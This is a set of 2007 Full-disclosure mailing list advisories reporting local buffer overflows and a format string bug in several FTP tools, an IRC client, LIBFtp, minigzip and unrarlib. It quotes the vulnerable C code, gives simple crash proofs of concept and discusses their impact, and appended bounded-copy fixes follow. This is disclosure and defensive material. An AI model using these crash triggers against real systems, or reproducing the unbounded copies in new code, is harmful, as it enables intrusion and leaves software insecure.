Re: [Full-disclosure] dkftpbench 0.45 (Platoon:init) Local buffer overflow vulnerability

2007-03-20 Thread starcadi
sorry no suid

2007/3/20, 3APA3A <[EMAIL PROTECTED]>:
> Dear starcadi,
>
> Again, a very effective way for a user to exploit himself. How can you
> elevate your privileges that way? Is dkftpbench suid?
>
> --Monday, March 19, 2007, 10:32:27 PM, you wrote to 
> full-disclosure@lists.grok.org.uk:
>
> s> Description:
>
> s> dkftpbench is an FTP benchmark program inspired by SPECweb99. The
>
> s> $ dkftpbench -n1 -hlocalhost -p21 -u test -p`perl -e "print 'A'x135"`
> s> -v1 Segmentation fault $
>
>
>
> --
> ~/ZARAZA http://securityvulns.com/
> Venerable fossils! I await further letters from you. (Twain)
>
>


-- 
.original http://intel.shacknet.nu/
~ starcadi
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] cftp 0.12 (readrc) Local buffer overflow vulnerability

2007-03-19 Thread starcadi
Description:

CFTP is Comfortable FTP, a full screen ftp client.
Supported are FTP both with active and passive data connections,
IPv4 and IPv6, and SFTP (a file transfer protocol using SSH for
authorization and connection encryption).
Found a local buffer overflow in readrc(), where sprintf() is used with
no length check.
source: http://ftp.giga.or.at/pub/nih/cftp/

Source error:

int
readrc(char **userp, char **passp, char **hostp, char **portp, char **wdirp,
       int check_alias)
{
    FILE *f;
    char b[8192], *p, *tok, *q, *home;
    char *user, *pass, *host, *port, *wdir;

    if ((home=getenv("HOME")) == NULL)
        home = "";
    sprintf(b, "%s/.cftprc", home);   /* unbounded: HOME is copied into b[8192] with no length check */

    if ((f=fopen(b, "r")) == NULL) {
        if (errno == ENOENT)
            return 0;
        return -1;
    }
    [..]
}

The error is in sprintf(): the length of the getenv() result is never checked.

Proof of concept:

$ export HOME=`perl -e "print 'A'x8200"`
$ cftp
Segmentation fault
$

-- 
.original http://intel.shacknet.nu/
~ starcadi



[Full-disclosure] dkftpbench 0.45 (Platoon:init) Local buffer overflow vulnerability

2007-03-19 Thread starcadi
Description:

dkftpbench is an FTP benchmark program inspired by SPECweb99. The
result of the benchmark is a number-of-simultaneous-users rating;
after running the benchmark properly, you have a good idea how many
simultaneous dialup clients a server can support. The target bandwidth
per client is set at 28.8 kilobits/second to model dialup users; this
is important for servers on the real Internet, which often serve
thousands of clients on only 10 MBits/sec of bandwidth.
Found a buffer overflow in the Platoon::init function, which uses strcpy()
with no length check.
source: http://www.kegel.com/dkftpbench/

Source error:

in main():
--
int main(int argc, char **argv)
{
    [..]
    const char *arg_username = "anonymous";
    const char *arg_password = "robouser@";

    [..]
    } else if (!strncmp(argv[i], "-u", 2)) {
        arg_username = &argv[i][2];          /* attacker-sized command line argument */
    } else if (!strncmp(argv[i], "-p", 2)) {
        arg_password = &argv[i][2];

    [..]
    Platoon thePlatoon;
    thePlatoon.init(poller, &sked, arg_filename,
                    arg_clientBandwidth, arg_minClientBandwidth, arg_mtu,
                    arg_hostname, arg_portnum, arg_username, arg_password,
                    local_addrs, n_local_addrs);

    [..]
}
--

in Platoon.h:
--
/// The user name part of the URL to fetch
char m_username[128];
/// The password part of the URL to fetch
char m_passwd[128];
--

in Platoon.c:
--
void Platoon::init(Poller *poller, Sked *sked, const char *filename,
                   int maxBytesPerSec, int minBytesPerSec, int bytesPerRead,
                   const char *servername, int port,
                   const char *username, const char *passwd,
                   struct sockaddr_in *local_addrs, int n_local_addrs)
{
    [..]
    m_port = port;
    m_sked = sked;
    strcpy(m_passwd, passwd);            /* m_passwd is char[128]: no length check */
    strcpy(m_servername, servername);
    strcpy(m_username, username);        /* m_username is char[128]: no length check */
    m_verbosity = 0;
    m_local_addrs = local_addrs;
    [..]
}
--

Proof of concept:

$ dkftpbench -n1 -hlocalhost -p21 -u test -p`perl -e "print 'A'x135"` -v1
 -h127.0.0.1 host name of ftp server
 -P21 port number of ftp server
 -n1 number of users
 -c1 target number of simultaneous connection attempts
 -k2 Start next connection when: 1=immediately, 2=after prev connect complete
 -t0 length of run (in seconds)
 -b3600 desired bandwidth (in bytes per second)
 -B2700 min acceptable per-client bandwidth (in bytes per second)
 -ufederico user name
 -paa[..]
 -fusenet/rec.juggling/juggling.FAQ.Z file to fetch
 -m1500 bytes per 'packet'
 -v1 verbosity
 -sp selector (p=poll, s=select, d=/dev/poll, k=kqueue, r=rtsig, f=sig-per-fd)
 -a0 use all local interfaces
Using poll()
Segmentation fault
$

-- 
.original http://intel.shacknet.nu/
~ starcadi



[Full-disclosure] Rhapsody IRC 0.28b (NICK) Multiple fs and bof vulnerability

2007-03-17 Thread starcadi
Rhapsody IRC 0.28b (NICK) Multiple fs and bof vulnerability

Description:

Rhapsody is a text console IRC client for Unix operating systems. It
is small, fast, portable, easy to use and full featured. An intuitive
menu-driven user interface makes rhapsody ideal for beginner to
intermediate users.
Found buffer overflows in various functions.
source: http://sourceforge.net/projects/rhapsody/

Source error:

#define MAXDATASIZE 1024
char nick[MAXDATASIZE];

- command request overflow

/* %s and %[ carry no field width: input longer than MAXDATASIZE overflows the targets */
if (!sscanf(buffer, "/%s %[^\n]", command, parameters)){
    return(E_NONE);
}

- "connect" and "server" request overflow

if (strcasecmp(command, "connect") == 0 || strcasecmp(command, "server") == 0){
    pnum = sscanf(parameters, "%s %d", server, &port);
    if (pnum < 1){
        vprint_all("Usage: /%s  [port]\n", command);
        return(E_OTHER);
    }

- "nick" request overflow

else if (strcasecmp(command, "nick") == 0){
    pnum = sscanf(parameters, "%s", nick);
    if (pnum < 1){
        vprint_all("Usage: /nick \n");
    }
    else{
        sendcmd_server(currentserver, "NICK", nick, "",
                       currentserver->nick);
        strcpy(currentserver->lastnick, currentserver->nick);
        strcpy(currentserver->nick, nick);

    }
    return(E_OTHER);
}

- "ctcp" request overflow

else if (strcasecmp(command, "ctcp") == 0){
    if (sscanf(parameters, "%s %[^\n]", nick, message) == 2){
        sendcmd_server(currentserver, "PRIVMSG",
                       create_ctcp_message(message), nick, currentserver->nick);
    }
    else vprint_all("Usage: /ctcp  |\n");
    return(E_OTHER);
}

- "dcc chat/send" request overflow

if (strcasecmp(subcommand, "chat") == 0){
    pnum = sscanf(subparameters, "%s %[^\n]", nick, message);
    if (pnum < 1){
        vprint_all("Usage: /dcc chat \n");
        return(E_OTHER);
    }

- "notice" request overflow

else if (strcasecmp(command, "notice") == 0){
    pnum = sscanf(parameters, "%s %[^\n]", nick, message);
    if (pnum < 2){
        vprint_all("Usage: /%s | \n", command);
        return(E_OTHER);
    }
    sendcmd_server(currentserver, "NOTICE", message, nick,
                   currentserver->nick);
    return(E_OTHER);
}

- "msg" and "message" request overflow

else if (strcasecmp(command, "msg") == 0 || strcasecmp(command, "message") == 0){
    pnum = sscanf(parameters, "%s %[^\n]", nick, message);
    if (pnum < 2){
        vprint_all("Usage: /%s  \n", command);
        return(E_OTHER);
    }
    else if (strcmp(nick, currentserver->nick) == 0) print_all("You can not chat with yourself.\n");
    else if (!currentserver->active) print_all("Must be connected to a server to chat.\n");
    else {
        sendcmd_server(currentserver, "PRIVMSG", message, nick,
                       currentserver->nick);
        return(E_OTHER);
    }
}

- "chat" and "query" request overflow

else if (strcasecmp(command, "chat") == 0 || strcasecmp(command, "query") == 0){
    chat *C;

    pnum = sscanf(parameters, "%s %[^\n]", nick, message);
    if (pnum < 1){
        vprint_all("Usage: /%s  \n", command);
        return(E_OTHER);
    }

- "me" and "ctcp" request format string

comm.c: 472
char *create_ctcp_message(char *message, ...){
    static char buffer[MAXDATASIZE];
    va_list ap;
    char string[MAXDATASIZE];

    va_start(ap, message);
    vsprintf(string, message, ap);   /* user text used as the format string, unbounded */
    va_end(ap);

    sprintf(buffer, "%c%s%c", 1, string, 1);
    return(buffer);
}

and others: whois, mode, topic, ..

-- 
.original http://intel.shacknet.nu/
~ starcadi

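The two defects reported above, the width-less sscanf() conversions and the user text used as a vsprintf() format in create_ctcp_message(), fixed side by side as an added example; this is not Rhapsody's code, MAXDATASIZE and the nick[]/message[] sizes follow the post, and parse_nick_message(), ctcp_wrap() and oversized_nick_rejected() are assumed names.

```c
#include <stdio.h>
#include <string.h>

#define MAXDATASIZE 1024   /* as in the post: nick[] and message[] are this size */

/* Parse "<nick> [message]" parameters into nick[] and message[].
 * Before: sscanf(parameters, "%s %[^\n]", nick, message) has no field width,
 * so a token longer than MAXDATASIZE-1 bytes overflows nick. After: each
 * conversion carries the width MAXDATASIZE-1 (1023), leaving room for the NUL,
 * and a nick token that hit the width is rejected instead of silently cut.
 * Returns 2 (nick+message), 1 (nick only), 0 (nothing), -1 (nick too long). */
static int parse_nick_message(const char *parameters, char *nick, char *message)
{
    int consumed = 0;
    nick[0] = message[0] = '\0';
    if (sscanf(parameters, "%1023s%n", nick, &consumed) < 1)
        return 0;
    if (parameters[consumed] != '\0' && parameters[consumed] != ' '
        && parameters[consumed] != '\t')
        return -1;   /* width stopped mid-token: the nick did not fit */
    if (sscanf(parameters + consumed, " %1023[^\n]", message) == 1)
        return 2;
    return 1;
}

/* Before: create_ctcp_message(message) used the user's text as the vsprintf()
 * format, so %n/%s/%x inside a /me or /ctcp line were interpreted, and then
 * sprintf()'d the result into a fixed buffer. After: the text is only ever a
 * %s argument and the \001...\001 framing is bounded. Returns the length
 * written or -1 if it would not fit. */
static int ctcp_wrap(char *out, size_t outsz, const char *text)
{
    int n = snprintf(out, outsz, "%c%s%c", 1, text, 1);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

/* Constructed check: a 1223-byte nick token, which the original sscanf()
 * would have written past the end of nick[MAXDATASIZE]. */
static int oversized_nick_rejected(void)
{
    static char params[MAXDATASIZE + 200];   /* static => trailing NUL */
    char nick[MAXDATASIZE], message[MAXDATASIZE];
    memset(params, 'A', sizeof params - 1);
    return parse_nick_message(params, nick, message) == -1;
}
```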


Re: [Full-disclosure] QFTP (LIBFtp 3.1-1) (command line) sprintf() local buffer overflow

2007-03-15 Thread starcadi starcadi
I know, but the security argument in general terms comprises this type too.

2007/3/16, [EMAIL PROTECTED] <[EMAIL PROTECTED]>:
> On Thu, 15 Mar 2007 21:12:50 BST, =?ISO-8859-1?Q?Knud_Erik_H=F8jgaard?= said:
> > On 3/15/07, starcadi starcadi <[EMAIL PROTECTED]> wrote:
> >
> > > >> POC
> > yes, piece of crap. Who cares about local overflows in non-suid 
> > applications?
>
> It can be interesting if you can find a way to get some *other* user to
> run the application - so if you can find a web server that has a CGI that
> invokes QFTP (or whatever) with attacker-controlled parameters, you can use
> that to pwn the webserver.  Basically, you need to be able to leverage the
> distinction between "yourself" and "the userid executing the program".
>
>


-- 
~ starcadi



[Full-disclosure] LIBFtp 5.0 (sprintf(), strcpy()) Multiple local buffer overflow

2007-03-15 Thread starcadi starcadi
http://www.netsw.org/net/ip/filetrans/ftp/libftp/

>> Description

The library has multiple buffer overflows (sprintf(), strcpy()) in
various functions.

>> Source errors

fvuln = FtpArchie() FtpDebugDebug() FtpOpenDir() FtpSize()

FtpString is a typedef of a 256-byte array:
FtpLibrary.h: typedef char FtpString[256];

..
STATUS FtpChmod(FTP *ftp,char *file,int mode)
{
  FtpString msg;

  sprintf(msg,"SITE CHMOD %03o %s",mode,file);   /* file copied into 256 bytes unbounded */
  return FtpCommand(ftp,msg,"",200,EOF);

}

..

int FtpArchie ( char *what, ARCHIE *result, int len)
{
  FILE *archie;
  FtpString cmd,tmp;
  int i;

  bzero(result,sizeof(result[0])*len);

  sprintf(cmd,"archie -t -l -m %d %s",len,what);

  if ((archie = popen(cmd,"r"))==NULL)
    return 0;

..

STATUS FtpDebugDebug(FTP *ftp,int n, char * Message)
{
  FtpString tmp;


  strcpy(tmp,Message);

  if (strncmp(tmp,"PASS ",5)==0)
    {
      char *p=tmp+5;
      while ( *p != '\0') *p++='*';
    };

..

STATUS FtpOpenDir(FTP * con,char * file)
{
  FtpString command;

  if ( file == NULL || *file == '\0' )
    strcpy(command,"NLST");
  else
    sprintf(command,"NLST %s",file);

  return FtpCommand(con,command,"",120,150,200,EOF);
}

..

int FtpSize(FTP * con, char *filename)
{
  FtpString tmp;
  int i,size;

  strcpy(tmp,"SIZE ");
  strcat(tmp,filename);

  if ( FtpSendMessage(con,tmp) == QUIT )
    return EXIT(con,QUIT);
..

>> POC

#include <stdlib.h>
#include <string.h>
#include "FtpLibrary.h"   /* FtpSize() and the 256-byte FtpString */

#define OVF_BUF (270)

int main()
{
    char *buf;

    buf = (char *) malloc(OVF_BUF+1);
    memset(buf, 'A', OVF_BUF);
    buf[OVF_BUF] = '\0';   /* terminate the string */

    // insert function to init ftp connection..
    // insert function to manage ftp connection..

    // calling vulnerable function example FtpSize()
    FtpSize(NULL, buf);

    // insert function to close ftp connection..

    return(0);
}

-- 
~ starcadi



[Full-disclosure] QFTP (LIBFtp 3.1-1) (command line) sprintf() local buffer overflow

2007-03-15 Thread starcadi starcadi
http://nbpfaus.net/~pfau/ftplib/

qftp is a utility that performs file transfers using ftplib based on
instructions presented on the command line.

>> Description

Buffer overflow in sprintf(): set_umask() doesn't check the length of the passed argument.

>> Source error

in main():
337:  case 'm' : set_umask(optarg); break;
..
void set_umask(char *m)
{
    char buf[80];
    sprintf(buf,"umask %s", m);   /* m comes from the command line, buf is 80 bytes */
    ftp_connect();
    FtpSite(buf, conn);
}

>> POC

$ gcc ftplib.c getopt.c qftp.c -o ftpsend
$ ftpsend localhost -l login -p passwd -m `perl -e "print 'a'x90"`
Segmentation fault

# eip addr: $1 = (void *) 0x61616161

-- 
~ starcadi



[Full-disclosure] Python 2.5 (Modules/zlib) minigzip local buffer overflow vulnerability

2007-03-14 Thread starcadi starcadi

Description:

The Python source contains various modules; the zlib module contains a
minigzip tool (minigzip is a minimal implementation of the gzip utility).

Source error:

The error was found in:
- void file_compress(file, mode)
because strcpy() is used inappropriately.

--
#define MAX_NAME_LEN 1024
[..]
void file_compress(file, mode)
    char  *file;
    char  *mode;
{
    local char outfile[MAX_NAME_LEN];
    FILE  *in;
    gzFile out;

    strcpy(outfile, file);        /* no length check: file + GZ_SUFFIX must fit in 1024 bytes */
    strcat(outfile, GZ_SUFFIX);
--

The function file_compress() is called by main().

Proof of concept:

If you want to test the vulnerability, try:
$ minigzip `perl -e "print 'A'x1050"`

-- starcadi

[Full-disclosure] Unrarlib 0.4.0 (urarlib_get) Local buffer overflow

2007-03-13 Thread starcadi
Description:

In file unrarlib.c there is no length check on the filename passed to
urarlib_get(), which uses strcpy().

Source error:

--
char ArcName[255];                      /* RAR archive
..
int urarlib_get(void *output,
                unsigned long *size,
                char *filename,
                void *rarfile,
                char *libpassword)
/* Get a file from a RAR file to the "output" buffer. The UniquE RAR FileLib
 * does everything from allocating memory, decrypting and unpacking the file
 * from the archive. TRUE is returned if the file could be successfully
 * extracted, else a FALSE indicates a failure.
 */
{
  BOOL  retcode = FALSE;

#ifdef _DEBUG_LOG
  int  str_offs;                        /* used for debug-strings       */
  char DebugMsg[500];                   /* used to compose debug msg    */

  if(debug_log_first_start)
  {
    debug_log_first_start=FALSE;        /* only create a new log file   */
    debug_init(_DEBUG_LOG_FILE);        /* on startup                   */
  }

#endif

  InitCRC();                            /* init some vars               */

  strcpy(ArgName, filename);            /* set file(s) to extract       */
#ifdef _USE_MEMORY_TO_MEMORY_DECOMPRESSION
  MemRARFile = rarfile;                 /* set pointer to mem-RAR file  */
#else
  strcpy(ArcName, rarfile);             /* set RAR file name: 255 bytes, no length check */
#endif
--


-- starcadi



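The same defect recurs in every advisory above (cftp readrc(), dkftpbench Platoon::init(), LIBFtp, qftp set_umask(), minigzip file_compress() and unrarlib urarlib_get()): an unbounded strcpy()/sprintf() of attacker-sized input into a fixed buffer. As an added example that is not part of any of these posts or projects, one bounded-join helper applied to three of those shapes; bounded_join(), build_rc_path(), build_out_name(), set_field() and oversized_inputs_rejected() are assumed names, and the buffer sizes are the ones the posts give.

```c
#include <stdio.h>
#include <string.h>

/* Join prefix+suffix into dst (dstsz bytes): 0 on success, -1 when the result
 * would not fit. dst is always NUL-terminated and is emptied on failure, so a
 * truncated path or field is never used by mistake. */
static int bounded_join(char *dst, size_t dstsz, const char *prefix, const char *suffix)
{
    int n = dstsz ? snprintf(dst, dstsz, "%s%s", prefix, suffix) : -1;
    if (n < 0 || (size_t)n >= dstsz) {
        if (dstsz) dst[0] = '\0';
        return -1;
    }
    return 0;
}
/* Hardened shape of cftp readrc(): $HOME is attacker-sized input, so the
 * "%s/.cftprc" join is bounded and an over-long HOME is reported, not copied. */
static int build_rc_path(char *buf, size_t bufsz, const char *home)
{
    return bounded_join(buf, bufsz, home ? home : "", "/.cftprc");
}
/* Hardened shape of minigzip file_compress(): file + GZ_SUFFIX must fit in
 * outfile[MAX_NAME_LEN] (sizes as in the post). */
#define MAX_NAME_LEN 1024
#define GZ_SUFFIX ".gz"
static int build_out_name(char *outfile, const char *file)
{
    return bounded_join(outfile, MAX_NAME_LEN, file, GZ_SUFFIX);
}
/* Hardened shape of a fixed-width field copy such as Platoon::init()'s
 * m_passwd[128] or unrarlib's ArcName[255]: a value with no room in the
 * field is rejected instead of being written past its end. */
static int set_field(char *field, size_t fieldsz, const char *value)
{
    return bounded_join(field, fieldsz, value, "");
}
/* Self-check with constructed inputs of the sizes the advisories used:
 * an 8200-byte HOME, a 1050-byte filename and a 135-byte password. */
static int oversized_inputs_rejected(void)
{
    static char home[8201], file[1051], pass[136];   /* static => NUL-padded */
    char path[8192], out[MAX_NAME_LEN], field[128];
    memset(home, 'A', 8200); memset(file, 'A', 1050); memset(pass, 'A', 135);
    return build_rc_path(path, sizeof path, home) == -1
        && build_out_name(out, file) == -1
        && set_field(field, sizeof field, pass) == -1;
}
```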